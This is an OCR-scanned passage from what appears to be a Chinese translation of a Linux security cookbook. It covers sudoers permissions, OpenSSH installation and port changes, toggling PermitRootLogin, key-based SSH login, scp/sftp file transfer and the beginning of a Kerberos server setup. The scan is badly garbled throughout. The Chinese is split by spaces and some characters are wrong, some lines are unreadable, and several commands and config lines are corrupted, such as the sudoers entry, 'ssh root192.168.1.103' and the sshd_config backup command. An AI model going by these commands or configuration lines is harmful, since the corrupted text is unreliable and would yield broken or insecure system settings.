# Cmnd alias specification 


# User privilege specification 


root et ee ABD 
userl ALL-S(ALL :ALL) ALL 


8. 现 在 ， 用 户 user1 兰 试 执行 任何 sudo 命令 都 会 被 提示 输入 口令 : 


rootükali:-£ su userl 

$ sudo ps 

[sudo] password for userl: 
PID TTY TIME CMD 

3109 pts/O 00:00:00 su 

3118 pts/O 00:00:00 sudo 


3119 pts/O 00:00:00 ps 
3466 pts/O 00:00:00 bash 
$ sudo uname 

[sudo] password for userl: 
Linux 


tl 


9. 现 在 ， 假 设 要 使 ser1 账 号 拥有 更 改 user2 和 user3 口 令 的 权限 。 编 辑 文 件 /etc/sudoers， 加 入 下 面 一 行 : 


userl ALL = /usr/bin/passwd user2, /usr/bin/passwd user3l 


10. 从 user1 登 录 并 党 试 修改 user2 和 user3 的 账号 口令 : 


rootükali:-4f su userl 

$ passwd user? 

passwd: You may not view or modify password information for user2. 
$ sudo passwd user2 


Enter new UNIX password: 
Retype new UNIX password: 


passwd: password updated successfully 

$ passwd user3 

passwd: You may not view or modify password information for user3. 
$ sudo passwd user3 

Enter new UNIX password: 

Retype new UNIX password: 

passwd: password updated successfully 


使 用 sudo 命 令 和 /etc/sudoers 文 件 ， 可 以 对 命令 的 执行 情况 进行 必要 更 改 。 


通过 修改 /etc/sudoers 文 件 ， 可 以 允许 以 另 一 个 用 尸 的 身份 执行 程序 。 还 可 以 通过 添加 “NOPASSWD” 选 项 使 得 程序 执行 
时 不 要 求 输入 口令 。 本 市 还 介绍 了 通过 在 文件 中 添加 必要 的 配置 信息 ， 使 得 每 次 执行 Sudo 命 令 时 都 会 提示 输入 口令 。 


本 节 最 后 展示 了 如 何 授权 一 个 用 尸 去 更 改 其 他 账号 口令 。 


Hom ”Linux 中 的 远程 认证 


本 章 将 讨论 如 下 主题 : 
: 使 用 SSH 远 程 访 问 服务 器 /主机 
- 禁止 或 允许 root 账 号 的 SSH 登 录 
基于 密 钥 加 强 SSH 远 程 访问 的 安全 性 
- 远程 复制 文件 


. 在 Ubuntu 上 建立 Kerberos 服 务 器 


5.1 ”使 用 SSH 远 程 访问 服务 器 /主机 
SSH， 即 Secure Shell， 是 用 于 安全 登录 远程 系统 的 协议 ， 是 访问 远程 Linux 系 统 最 常用 的 方法 。 


准备 工作 
要 了 解 如 何 使 用 SSH， 我 们 需要 准备 两 个 Ubuntu 系统 : 一 个 用 作 服 务 器 ， 而 另 一 个 用 作客 户 端 。 


操作 指南 


SSH 是 一 种 协议 ， 实 现 该 协议 的 软件 工具 不 止 一 个 ， 我 们 可 以 使 用 免费 的 一 款 名 叫 ODpenSsH 的 软件 。 在 Linux 系 统 中 安 闻 好 
OpenSSH 后 ， 就 可 以 使 用 命令 “ssh” 局 动 它 。 下 面 给 出 使 用 SSH 的 详细 步骤 : 


1. 如 果 系 统 中 还 没有 安 濠 SSH 软件， 那么 必须 安 濠 SSH 的 客 尸 端 和 服务 器 端 软 件 。 


在 作为 SSH 服 务 器 的 Ubuntu 上 安装 OpenSSH 服 务 器 端 程序 的 命令 如 下 : 
sudo apt-get install openssh-server 


执行 上 述 命 令 后 一 般 会 得 到 如 下 图 所 示 的 输出 : 


tajindergütj-dev:-S sudo apt-get install openssh-server 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
The following extra packages will be installed: 
ssh-import-id 
Suggested packages: 
rssh molly-guard openssh-blacklist openssh-blacklist-extra monkeysphere 
The following NEW packages will be installed: 
openssh-server ssh-import-id 
9 upgraded, 2 newly installed, © to remove and 326 not upgraded. 
Need to get 350 kB of archives. 
After this operation, 895 kB of additional disk space will be used. 
Do you want to continue [Y/n]? y 
Get:1 http://in.archive.ubuntu.com/ubuntu/ precise-updates/main openssh-server i 
386 1:5.9p1-5ubuntu1.7 [343 kB] 
Get:2 http://in.archive.ubuntu.com/ubuntu/ precise/main ssh-import-id all 2.10-€ 
ubuntu1 [6,598 B] 
Fetched 350 kB in 15s (22.6 kB/s) 


2. 接 下 来 ， 需 要 在 作为 SSH 客 己 端 的 Ubuntu 上 安装 OpenSSH 的 客户 端 程序 ， 命 令 如 下 : 
sudo apt-get install openssh-client 


命令 执行 后 的 输出 如 下 图 所 示 : 


tajinder@tj-dev:~$ sudo apt-get install openssh-client 
[sudo] password for tajinder: 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
Suggested packages: 
libpam-ssh keychain monkeysphere openssh-blacklist openssh-blacklist-extra 
The following packages will be upgraded: 


openssh-client 
1 upgraded, 8 newly installed, 8 to remove and 326 not upgraded. 
Need to get 961 kB of archives. 
After this operation, 1,024 B of additional disk space will be used. 
Get:1 http://in.archive.ubuntu.com/ubuntu/ precise-updates/main openssh-client i3 
86 1:5.9p1-5ubuntu1.7 [961 kB] 
Fetched 961 kB in 10s (92.6 kB/s) 


3. Egi BOpenSSHESZo ER BfiHaSSHBRSS, SUSR'EZKBEIESSIEIAU. $i JRIEATAT P7085 SIG: 


sudo service ssh start 


执行 后 ， 输 出 如 下 : 


tajinder(tj-dev:-$ sudo service ssh start 
sudo: unable to resolve host tj-dev-server 
ssh start/running, process 6441 


tajinder(itj-dev:-5 


4. 现 在 我 们 试 着 使 用 SSH 从 客 尸 端 登录 服务 器 ， 在 客户 端 主 机 的 终端 上 执行 下 列 命 令 : 


ssh remote ip address 


这 里 “服务 器 的 IP 地 址 ”需要 参考 Ubuntu 服 务 器 的 ip 地 址 设置 ， 按 实际 IP 地 址 键入 。 假 设 Ubuntu 服 务 器 的 IP 地 址 为 


192.168.1.108， 那 么 执行 上 述 命 令 后 ， 输 出 如 下 : 


tajinder(gtj-dev:-S ssh 192.168.1.108 

The authenticity of host '192.168.1.188 (192.168.1.108)' can't be established. 
ECDSA key fingerprint is 31:9d:b4:6e:ab:ed:d0:0f:14:28:6c:df:eb:fb:1f:0b. 

Are you sure you want to continue connecting (yes/no)? yes 

Warning: Permanently added '192.168.1.188' (ECDSA) to the list of known hosts. 
tajinder(192.168.1.108's password: 

Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686) 


* Documentation: M https://help.ubuntu. com/ 


packages can be updated. 
updates are security updates. 


release '14.04.3 LTS' available. 
'do-release-upgrade' to upgrade to it. 


Last login: Tue Dec 29 00:31:19 2015 from tj-dev.local 
tajinder(tj-dev-server:-$ 


上 图 中 服务 器 主机 与 客户 端 主机 中 所 使 用 的 用 户 名 均 为 tajinder， 如 果 我 们 想 使 用 不 同 的 用 户 名 远程 登录 服务 器 ， 则 可 以 运 


sername@ 服 务 器 的 IP 地 划 


若 服 务 器 |P 地 址 为 192.168.1.108， 则 运行 结果 如 下 : 


tajindergütj-dev:-S ssh user1@192.168.1.108 
user18192.168.1.108's password: 
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686) 


* Documentation: M https: //help.ubuntu.com/ 


packages can be updated. 
updates are security updates. 


release '14.04.3 LTS' available. 
'do-release-upgrade' to upgrade to it. 


Last login: Tue Dec 29 00:32:26 2015 from tj-dev.local 
useri1Qtj-dev-server:-S 


5. 接 下 来 要 配置 SSH 以 满足 我 们 的 需求 。Ubuntu 中 sshd 的 主 配 置 文件 是 /etc/ssh/sshd config。 在 进行 任何 修改 之 前 ， 请 
先 备 份 原始 配置 文件 ， 命 令 如 下 : 


sudo cp /etc/ssh/sshd config(l,.bak) 
该 配置 文件 定义 了 ssH 服 务 器 的 默认 设置 。 备 份 后 ， 会 在 相同 目录 下 生成 一 个 与 sshd_conf 内 容 相同 且 名 为 sshd_conf.bak 
的 文件 。 


6. 使 用 任意 文本 编辑 器 打开 配置 文件 ， 可 以 看 到 sshd 服 务 器 默认 的 入 站 连接 监听 端口 为 22。 为 了 加 强 安全 性 ， 防 止 端 口 扫 
摘 工 具 对 sshd 服 务 的 扫 摘 ， 我 们 可 以 将 该 痊 口 号 设置 为 某 个 非 标准 的 闯 口 号 (修改 后 要 重 局 sshd 服 务 ， 新 配置 才能 生效 ) 。 之 
后 用 户 在 客户 端 连接 该 SSH 服 务 器 时 ， 需 要 运行 市 哨 口 参数 的 命令 : 


ssh-p 端 口号 ”服务 器 的 I|P 地 址 


假设 我 们 更 改 sshd 入 站 监听 端口 为 888， 而 服务 器 IP 地 址 为 192.168.1.108， 那 么 命令 执行 结果 如 下 : 


tajinderütj-dev:-$ ssh useri(0192.168.1.108 

ssh: connect to host 192.168.1.108 port 22: Connection refused 
tajinder(itj-dev:-S 

tajinder(itj-dev:-S 

tajinder(gtj-dev:-S ssh -p 888 user1(192.168.1.108 
user10192.168.1.108's password: 

Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic 1686) 


* Documentation: M https://help.ubuntu.com/ 


330 packages can be updated. 
229 updates are security updates. 


New release '14.04.3 LTS' available. 
Run 'do-release-upgrade' to upgrade to it. 


Last login: Thu Dec 31 08:48:57 2015 from tj-dev.local 
useri(itj-dev-server:-$ 用 


从 上 图 中 我 们 可 以 发 现 ， 如 果 不 在 命令 中 键入 修改 后 的 端口 号 ， 那 么 连接 请 求 将 被 拒绝 ; 而 当 我 们 键入 正确 的 端口 号 888 
后 ，ssh 和 连接 得 以 建立 。 


SSH 用 于 在 客户 端 和 SSH 服 务 器 之 间 建 立 安全 连接 ， 我 们 在 一 个 Ubuntu 系统 上 安装 openssh-server 程 序 包 ， 建 立 SSH 服 务 
器 ; 在 另 一 个 Ubuntu 系统 上 安 凌 openssh-client 程 序 包 ， 将 它 作为 SSH 客 户 疹 。 保 持 SSH 服 务 器 的 运行 ， 束 能够 通过 客户 疹 连 
接 它 。 我 们 还 可 以 通过 配置 文件 改变 SSH 服 务 器 的 默认 设置 ， 例 如 修改 SSH 的 默认 连接 端口 。 


Linux 系 统 上 默认 存在 root 账 号 ， 并 且 默 认 是 局 用 的 。 如 果 未 授权 用 己 能 够 以 root 身 份 经 SSH 访 问 Linux 系 统 ， 那 整个 系统 将 暴 
露 在 攻击 者 面前 ， 这 可 不 是 件 好 事 。 


我 们 可 以 禁止 或 允许 以 root 身 份 经 SSH 登 录 服 务 器 ， 防 止 攻击 者 有 机 会 远程 访问 系统 。 
准备 工作 


为 方便 介绍 如 何 禁 止 或 允许 以 root 账 号 登录 SSH 服 务 ， 我 们 需要 准备 两 个 Ubuntu 系 统 : 一 个 用 作 服 务 器 ， 而 另 一 个 用 作客 
户 端 。 如 上 文 所 述 ， 在 服务 器 尊 需 要 安装 openssh-server 程 序 ， 而 在 客户 新 需要 安装 openssh-client。 


操作 指南 


我 们 首先 介绍 如 何 禁 止 SSH 中 以 root 身 份 登录 ， 然 后 再 介绍 如 何 允 许 以 root 身 份 登 录 。 


1. 使 用 文本 编辑 器 打开 SSH 服 务 器 的 主 配置 文件 /etc/ssh/sshd config， 命 令 如 下 : 


sudo nano /etc/ssh/sshd config 


2. 在 配置 文件 中 找到 含有 “PermitRootLoginyes” 的 一 行 。 


3. 将 “yes” 改写 为 “no”,， 即 “PermitRootLoginno”， 如 下 图 所 示 : 


à Authentication: 
LoginGraceTime 120 


PermitRootLogin no 
StrictModes yes 


4. 完 成 上 述 步骤 后 ， 使 用 下 列 命 令 重 新 局 动 SSH 服 务 : 


tajinder(tj-dev:-S sudo service ssh restart 
sudo: unable to resolve host tj-dev-server 
ssh stop/waiting 

ssh start/running, process 4416 
tajinder(itj-dev:-S 


5.3 cELERIJZSRLArootEHMgXRSSHBRS$SES. EJ BUBJS,. Weis, mssHePumiixe-— Permission 


denied" 错误 。 


tajinder@tj-dev:~$ ssh root192.168.1.103 
root((192.168.1.103's password: 
Permission denied, please try again. 


root(i192.168.1.103's password: 


6. 如 果 我 们 仍 想 以 root 身 份 登 录 SSH 服 务 器 ， 那 么 必须 首先 以 普通 用 尸 登录 ， 然 后 使 用 “su” 命 令 切 换 为 root 身 份 ， 如 下 图 
所 示 。 如 果 登 录 时 使 用 的 用 户 未 被 写 在 /etc/sudoers 文 件 中 ， 那 么 该 用 己 束 不 能 切换 为 root， 这 样 束 能 够 防止 用 户 越 权 ， 使 系统 
更 加 安全 。 


tajindergtj-dev:-S ssh tajinderg192.168.1.103 
tajinderg192.168.1.103's password: 
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686) 


* Documentation: Mhttps://help.ubuntu.com/ 


New release '14.84.3 LTS' available. 
Run 'do-release-upgrade' to upgrade to it. 


The programs included with the Ubuntu system are free software; 
the exact distribution terms for each program are described in the 
individual files in /usr/share/doc/*/copyright. 


Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by 
applicable law. 


tajindergtj-dev-server:-S whoami 

tajinder 

tajinder(tj-dev-server:-$ su root 
Password: 
rootütj-dev-server:/home/tajinder?s whoami 
root 


7. 如 果 我 们 想 再 次 允许 以 root 身 份 登录 SSH 服 务 器 ， 那 只 需 再 次 编辑 SSH 服 务 的 主 配置 文件 /etc/ssh/sshd_config, 
将 “PermitRootLogin no” 改 为 “PermitRootLogin yes” 即 可 。 


# Authentication: 
LoginGraceTime 120 
PermitRootLogin yesi 
StrictModes yes 


8. 之 后 运行 如 下 命令 再 次 重启 sshd 服 务 : 


tajinder(itj-dev:-S sudo service ssh restart 
sudo: unable to resolve host tj-dev-server 
ssh stop/waiting 

ssh start/running, process 4416 
tajinder(tj-dev:-S 


9. 现 在 ， 如 果 在 SSH 客 户 端 上 尝试 以 root 身 份 登录 SSH 服 务 器 ， 那 么 登录 能 够 成 功 : 


tajinder(ütj-dev:-S ssh root192.168.1.103 
rootQ192.168.1.103's password: 
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686) 


* Documentation: Mhttps://help.ubuntu.com/ 


New release '14.04.3 LTS' available. 
Run 'do-release-upgrade' to upgrade to it. 


Last login: Mon Dec 28 16:25:34 2015 from tj-dev.local 
rootgQtj-dev-server:-z B 


原理 解析 


当 我 们 使 用 SSsH 迫 试 连 接 远 程 系统 时 ， 远 程 系统 会 检查 它 的 配置 文件 /etc/ssh/sshd_config， 根 据 文 件 的 配置 细节 决定 允许 
或 拒绝 某 个 连接 请 求 。 当 我 们 改变 配置 项 PermitRootLogin 的 值 时 ，SSH 服 务 器 的 处 理 万 式 相 应 地 随 之 改变 。 


拓展 学 习 


假设 系统 中 有 许多 用 户 ， 而 我 们 需要 编辑 /etc/ssh/sshd_config 文 件 仅 允许 一 部 分 用 户 使 用 SSH 服 务 ， 那 么 可 以 使 用 下 述 命 
令 打开 配置 文件 : 


sudo nano /etc/ssh/sshd config 
在 配置 文件 中 增加 如 下 配置 ， 人 允许 tajinder 和 user1 使 用 SSH 服 务 : 


AllowUsers tajinder userl 


之 后 重启 SSH 服 务 ， 使 配置 生效 : 


sudo service ssh restart 


现在 ， 当 我 们 尝试 以 user1 登 录 SSH 服 务 器 时 ， 登 录 是 成 功 的 。 然 而 当 我 们 以 user2 登 录 时 ， 由 于 user2 没 有 被 增加 到 配置 文 
件 中 ， 所 以 登录 失败 ， 客 户 端 返 回 “Permission denied” 的 错误 消息 。 


tajinder@tj-dev:~$ ssh useri1(192.168.1.103 
user10192.168.1.183's password: 
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686) 


* Documentation:  https://help.ubuntu.com/ 


New release '14.04.3 LTS' available. 
Run 'do-release-upgrade' to upgrade to it. 


Last login: Tue Dec 29 08:31:40 2015 from tj-dev.local 
useritj-dev-server:-S exit 

logout 

Connection to 192.168.1.103 closed. 

tajinder(tj-dev:-S 

tajindergtj-dev:-S ssh user2(192.168.1.103 
user2(0192.168.1.183's password: 

Permission denied, please try again. 
user2(0192.168.1.103's password: 


基于 窗 钥 加 强 SSH 远 程 功 问 的 安全 改 


尽管 用 户 使 用 口令 登录 SSH 服 务 器 能 够 起 到 一 定 的 安全 防护 效果 ， 但 使 用 基于 密 钥 的 认证 方法 能 够 加 强 3sH 远 程 访问 的 安全 
性 。 


为 了 便于 介绍 如 何 使 用 基于 密 钥 的 认证 方法 ， 我 们 需要 准备 两 个 Linux 系 统 (本 书 中 ， 我 们 使 用 两 个 Ubuntu Linux 系 统 ) 。 
一 个 作为 SSH 服 务 器 ， 安 六 了 OpenSSH 服 务 器 程序 ， 而 另 一 个 用 作客 己 端 ， 安 闪 了 OpenSSH 客 户 端 程序 。 


二 (全 + 已 直上 
IRI FIRA 


在 使 用 基于 密 钥 的 认证 方法 之 前 ， 需 要 先 创 建 一 对 密 钥 : 一 个 私 钥 和 一 个 公 钥 。 


1. 在 客户 端 或 本 地 系统 中 ， 执 行 下 列 命令 生成 SSH 密 钥 对 : 
ssh-keygen-t rsa 


执行 命令 后 ， 结 果 如 下 : 


useri(itj-dev-client:-S ssh-keygen -t rsa 

Generating public/private rsa key pair. 

Enter file in which to save the key (/home/useri/.ssh/id rsa): 
Created directory '/home/useri1/.ssh'. 

Enter passphrase (empty for no passphrase): 

Enter same passphrase again: 


Your identification has been saved in /home/useri/.ssh/id rsa. 
Your public key has been saved in /home/useri/.ssh/id rsa.pub. 
The key fingerprint is: 
79:23:12:5f:da:dc:ce:a2:06:90:39:78:a0:91:6c:86 user1(it j-dev-client 
The key's randomart image is: 
t RSA 2048]-----4 

| 


useriQtj-dev-client:-S 


2. 在 生成 密 钥 时 ， 我 们 可 以 采用 默认 信 或 根据 目 己 需要 进行 改变 。 生 成 密 钥 程序 还 会 要 求 键入 一 个 密码 ， 你 可 以 键入 任何 字 
符 ， 或 者 什么 都 不 输入 ， 该 密码 用 于 保护 私 钥 文件 。 


3. 密 钥 对 生成 后 将 保存 在 本 地 目录 “~ ./ssh/” 中 ， 进 入 该 目录 并 使 用 “ls-l” 命 令 可 以 查看 密 钥 文件 的 细 书 。 


useri@tj-dev-client:~$ cd -/.ssh/ 
useri(itj-dev-client:-/.sshS ls -l 


1 user1 useri 1766 Jan 3 02:58 id rsa 


-rw-r--r-- 1 useri useri 401 Jan 3 02:58 id rsa.pub 
useriQtj-dev-client:-/.sshS Bf 


上 图 中 的 id_rsa 文 件 仅 能 够 被 密 钥 所 有 者 读 取 和 改写 ， 这 也 确保 了 密 钥 文件 的 安全 。 


4. 现 在 ， 我 们 要 将 公 钥 文件 复制 到 远程 SSH 服 务 器 上 ， 可 以 运行 下 列 命令 完成 这 一 操作 (假设 远程 SSH 服 务 器 的 IP 地 址 为 
192.168.1.101) : 


ssh-copy-id 192.168.1.101 


iir, HARI RU: 


userigtj-dev-client:-/.sshS ssh-copy-id 192.168.1.101 

The authenticity of host '192.168.1.1081 (192.168.1.101)' can't be established. 
ECDSA key fingerprint is 31:9d:b4:6e:ab:ed:d0:0f:14:28:6c:df:eb:fb:1f:6ob. 

Are you sure you want to continue connecting (yes/no)? yes 

Warning: Permanently added '192.168.1.181' (ECDSA) to the list of known hosts. 
user10192.168.1.101's password: 


Now try logging into the machine, with "ssh '192.168.1.101'", and check in: 


-/[.ssh/authorized keys 
to make sure we haven't added extra keys that you weren't expecting. 


user1Qtj-dev-client:-/.sshS B 


上 述 命令 的 执行 会 在 SSH 服 务 器 与 客户 端 间 建 立 一 个 SSH 会 话 ， 并 且 提 示 你 键入 用 尸 的 口令 。 键 入 正确 的 口令 后 ， 公 和 钥 文 
件 将 被 复制 到 远程 服务 器 上 。 


6. 当 公 钥 文件 成 功 复制 到 服务 器 上 后 ， 再 次 使 用 命令 “ssh192.168.1.101” 尝试 登录 SSH 服 务 器 ， 结 果 如 下 : 
Userl@tj-dev-client:~/.ssh$ ssh 192.168.1.101 

Enter passphrase for key '/home/useri/.ssh/id rsa': 

Welcome to Ubuntu 12.084.4 LTS (GNU/Linux 3.11.08-15-generic i686) 
* Documentation: Mhttps://help.ubuntu.com/ 


330 packages can be updated. 
229 updates are security updates. 


New release '14.04.3 LTS' available. 
Run 'do-release-upgrade' to upgrade to it. 


Last login: Thu Dec 31 02:43:19 2015 from tj-dev.local 
useri1gtj-dev-server:-S | 


我 们 友 现 ， 登 录 时 要 求 输入 私 钥 文件 的 密码 ， 这 是 由 于 我 们 在 创建 SSH 密 钥 对 时 配置 了 密码 字段 。 如 果 在 创建 密 钥 对 时 没有 
输入 密码 ， 那 么 这 里 束 不 会 提示 输入 密码 而 直接 登录 到 远程 SSH 服 务 器 。 


当 我 们 生成 了 SSH 密 钥 对 ， 并 将 公 钥 文件 复制 到 远程 SSH 服 务 器 上 时 ， 客 户 端 使 用 SSH 连 接 服务 器 时 将 及 用 基于 密 钥 的 认证 
方法 。 如 果 存 放 在 SSH 服 务 器 上 的 公 钥 文件 与 SSH 客 尸 端 生成 的 公 钥 文件 相 匹 配 ， 并 且 SSH 客 己 端 存放 着 与 该 公 钥 文 件 相 匹配 的 
私 钥 文 件 ， 那 么 用 户 将 通过 认证 并 准许 登录 服务 器 ; 人 否则， 任何 一 个 密 钥 文 件 的 缺失 都 将 导致 认证 失败 ， 用 尸 登录 将 被 拒绝 。 


1] 如 果 SSH 服 务 器 的 监听 端口 已 经 修改 为 888， 那 么 上 述 命 令 就 应 修改 为 : ssh-copy-id -p 888 192.168.1.101。 


译 者 注 


许多 人 使 用 SSH 实 现 安全 的 远程 系统 管理 ， 但 并 不 知道 使 用 SSH 也 能 实现 远程 文件 的 上 传 和 下 载 。 


为 了 演示 文件 传送 工具 与 SSH 的 配合 使 用 ,我们 需要 两 个 可 以 相互 ping 通 的 Linux 系 统 。 其 中 一 个 Linux 系 统 要 安 闪 
OpenSSH 服 务 器 端 程序 并 保持 运行 ， 和 而 另 一 个 要 安装 OpenSSH 客 尸 端 程序 。 
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Linux 中 有 许多 种 工具 能 实现 联网 主机 间 的 数据 传输 ， 本 节 我 们 仅 介 绍 其 中 的 几 个 。 


1. 假 设 我 们 在 客户 端 Linux 上 有 一 个 文件 ， 名 为 “myfile.txt”， 现 在 想 将 它 复制 到 服务 器 上 去 ， 可 以 使 用 下 列 命令 : 


scp myfile.txt tajinder@sshserver.com:Desktop/ 


tajinder@sshclient:~$ scp myfile.txt tajinder@sshserver .com:Desktop/ 
tajinder@sshserver.com's password: 


myfile.txt 100% 22 0.0KB/s 00:00 
tajindergsshclient:-S 国 


上 述 命令 中 的 tajinder 是 用 户 名 ， 执 行 命令 时 需要 验证 用 户 的 口令 ， 用 户 认 证 通过 之 后 ， 文 件 myfile.txt 将 被 复 制 到 服务 器 
sshserver.com 中 用 户 tajinder 的 梨 面 文件 夹 “~/Desktop/” 中 。 


如 果 没 有 为 服务 器 端 设置 域名 ， 可 以 使 用 服务 器 的 IP 地 址 代 蔡 命令 中 的 sshserver.com。 


2. 当 检查 远程 SSH 服 务 器 时 ， 可 以 看 到 文件 myfile.txt 已 经 被 成 功 复制 了 。 


tajinder@sshserver:~/Desktop$ ls 
newfile.txt 
tajinder(sshserver:-/DesktopS pwd 
/home/tajinder/Desktop 
tajinder(sshserver:-/DesktopS ls 


myfile.txt newfile.txt 
tajinder(ssshserver:-/DesktopS cat myfile.txt 
This is a test file. 


scp -r mydata/ tajinderGsshserver.com:Desktop/ 


运行 后 的 输出 结果 如 下 : 


tajinder@sshclient:~$ ls 
Desktop Downloads Music myfile.txt Public Videos 
Documents  examples.desktop mydata Pictures Templates 


tajindergsshclient:-$ scp -r mydata/ tajinder(sshserver.com:Desktop/ 
tajinder(gsshserver.com's password: 


1005 19 0.0KB/s 00:00 
100% 21 SINT 4: E- 00:00 


10056 25 0. ƏKB/s 00:00 
tajindergsshclient:-$ B 


4. 检 查 远 程 服 务 器 ， 可 以 看 到 mydata 目 录 及 其 所 有 文件 都 已 经 被 成 功 复制 。 


tajinder(üsshserver:-/DesktopS ls 

mydata myfile.txt  newfile.txt 
tajinder(üsshserver:-/DesktopS cd mydata/ 
tajinder(üsshserver:-/Desktop/mydataS ls 
file1 file2 file3 
tajindergüsshserver:-/Desktop/mydataS Bi 


5. 现 在 介绍 如 何 实现 从 远程 服务 器 复制 文件 到 本 地 系统 。 假 设 服务 器 中 有 一 名 为 newfile.txt 的 文件 ， 如 下 图 所 示 : 


tajinderüsshserver:-/DesktopS ls 
mydata myfile.txt  newfile.txt 


tajindergsshserver:-/DesktopS B 


6. 在 本 地 主机 上 ， 为 了 将 所 需 文件 从 服务 器 复制 到 本 地 目录 中 ， 可 以 运行 如 下 命令 : 


scp -r tajinderGsshserver.com:/home/tajinder/Desktop/newfile.txt 


输出 结果 如 下 : 


tajindergüsshclient:-$ ls 

Desktop Downloads Music myfile.txt Public Videos 

Documents  examples.desktop mydata Pictures Templates 

tajinderüsshclient:-$ scp -r tajindergsshserver.com: /home/tajinder/Desktop/newfi 
le.txt . 

tajindergsshserver.com's password: 

newfile.txt 100% 25 0.0KB/s 00:00 


tajindergüsshclient:-$ ls 

Desktop Downloads Music myfile.txt Pictures Templates 
Documents  examples.desktop mydata newfile.txt Public Videos 
tajindergüsshclient:-S 

tajinder(üsshclient:-$ 


7. 除 了 使 用 scp， 我 们 还 可 以 使 用 sftp 实 现 交 互 式 的 文件 复制 。 


8. 要 使 用 sftp， 首 先 使 用 如 下 命令 建立 一 个 客 尸 病 与 服务 器 之 间 的 连接 : 


sftp tajinder@sshserver .com 
命令 的 执行 如 下 : 


tajinderüsshclient:-S sftp tajinder(sshserver.com 
tajinder(üsshserver.com's password: 

Connected to sshserver.com. 

sftp» ls 


9. 接 下 来 ， 可 以 运行 任何 FTP 命 令 。 本 例 中 ， 我 们 使 用 get 合 令 和 过 试 从 远程 服务 器 中 复制 文件 sample.txt 到 本 
i/home/tajinder/Desktop E R: 


get sample.txt /home/tajinder/Desktop 


sftp» cd Desktop/ 


myfile.txt newfile.txt  sample.txt 
sftp» get sample.txt /home/tajinder/Desktop 
Fetching /home/tajinder/Desktop/sample.txt to /home/tajinder/Desktop/sample.txt 
/home/tajinder/Desktop/sample.txt 100% 28 0.0KB/s 00:00 
sftp> 


10. 在 本 地 系统 中 查看 /home/tajinder/Desktop 目 录 ， 发 现 文件 Sample.txt 已 经 成 功 复制 了 。 


tajinder@sshclient:~$ cd Desktop/ 
tajindergüsshclient:-/DesktopS ls 


sample.txt 
tajinder(üsshclient:-/DesktopS 


11.SSH 也 能 在 GNOME 图 形 界面 下 工作 ， 所 以 我 们 可 以 不 使 用 命令 行 ， 而 使 用 GNOME 的 文件 浏览 器 来 建立 客 尸 新 与 服务 


器 间 的 SSH 连 接 。 


12. 在 GNOME 文 件 浏 览 d 器 中 ， 单 击 菜 单 "File" 一 “Connect to Server..." , 


File Edit View Go Bookmarks Help 


New Tab 

New Window 

Create New Folder 
Create New Document 


Connect to Server... 


Properties 


Restore Missing Files... 


Close All windows 
Close 


13. 在 下 一 个 窗口 中 ， 键 入 数据 连接 的 细节 信息 ， 然 后 单 击 “Connect” 按 钮 。 


Server Details 


Server: sshserver.com o | Port: | 22 = d 
Type: |SSH Mi 
Folder: J 


User Details 


User name: Lajinder 


Password: oases 
_| Remember this password 


Help | Cancel || 


14I, RiT AEST HG TEL FR EMNER R ERRAR EET. 


fS SFTP for tajinder on sshserver.com home | Q search 


myfile.txt newfile.txt 


sample.txt 


原理 解析 


为 实现 基于 SSH 的 远程 文件 复制 ， 我 们 可 以 使 用 scp 工 具 。scp 工 具 能 够 从 本 地 将 单个 文件 或 整个 文件 目录 复制 到 远程 服务 器 
上 。 在 复制 整个 目录 时 ， 需 要 在 scp 命 令 中 使 用 “-r” 选 项 。 要 从 远程 服务 器 复制 文件 到 本 地 ， 同 样 也 可 以 使 用 scp 命 令 , 但 需要 
清楚 服务 器 中 文件 的 路 径 。 


与 scp 类 似 的 sftp 工 具 ， 弟 用 于 从 远程 服务 器 复制 文件 到 本 地 主机 。SFTP (安全 的 FTP 协 议 ) 比 FTP 协 议 更 安全 ， 它 采用 
SSH 的 加 密 认证 功能 ， 保 证 了 数据 的 安全 性 。 

我 们 还 介绍 了 图 形 化 的 GNOME 文 件 浏览 器 ， 它 是 实现 远程 文件 传输 的 另 一 种 方法 ， 如 果 你 喜欢 图 形 化 的 操作 方式 ， 它 将 是 
个 不 错 的 选择 。 


5.5 在 Ubuntu 上 建 YVKerberos 服 务 器 


Kerberos 是 一 种 在 不 可 信和 网 络 环境 中 使 用 的 安全 认证 协议 ， 它 使 用 安全 密 钥 实现 加 密 认证 和 建立 与 第 三 方 的 信任 天 系 。 它 
基于 对 称 密 铀 和 可 信 的 第 三 方 实现 安全 认证 。 
准备 工作 


为 了 演示 Kerberos 的 安装 和 运行 ， 我 们 需要 3 个 Linux 系 统 (本 书 使 用 了 Ubuntu Linux) 。 它 们 之 间 要 能 相互 通信 ， 并 且 要 
有 精确 的 系统 时 钟 。 这 3 个 Linux 系 统 的 主机 名 分 别 命名 为 [1]: 


: Kerberos 服 务 器 : myketbetos.com 
- SSH 服 务 器 : sshserver.com 
. 客户 端 : sshclient.com 


完成 以 上 工作 后 ， 还 需要 编辑 每 个 Linux 系 统 的 /etc/hosts 文 件 ， 增 加 以 下 内 容 : 


192.168.1.196 sshclient.com 


192.168.1.1081 sshserver.com 
192.168.1.118 — mykerberos.com 


你 可 以 为 3 个 Linux 系 统 指 定 不 同 于 上 图 的 IP 地 址 和 主机 名 ， 只 要 能 保证 完成 设置 后 3 个 Linux 系 统 可 以 相互 ping 通 即 可 。 


操作 指南 
现在 ， 让 我 们 看 看 如 何 完成 Kerberos 服 务 器 与 其 他 配套 系统 的 安装 配置 。 


1. 安 装 Kerberos 服 务 器 。 在 主机 mykerberos.com 中 运行 以 下 命令 : 


sudo apt-get install krb5-admin-server krb5-kdc 


命令 执行 过 程 如 下 : 


tajinder@mykerberos:~$ sudo apt-get install krb5-admin-server krb5-kdc 

[sudo] password for tajinder: 

Reading package lists... Done 

Building dependency tree 

Reading state information... Done 

The following extra packages will be installed: 
krb5-config krbs-user libgssapi-krb5-2 libgssrpc4 libkadmsclnt-mit8 
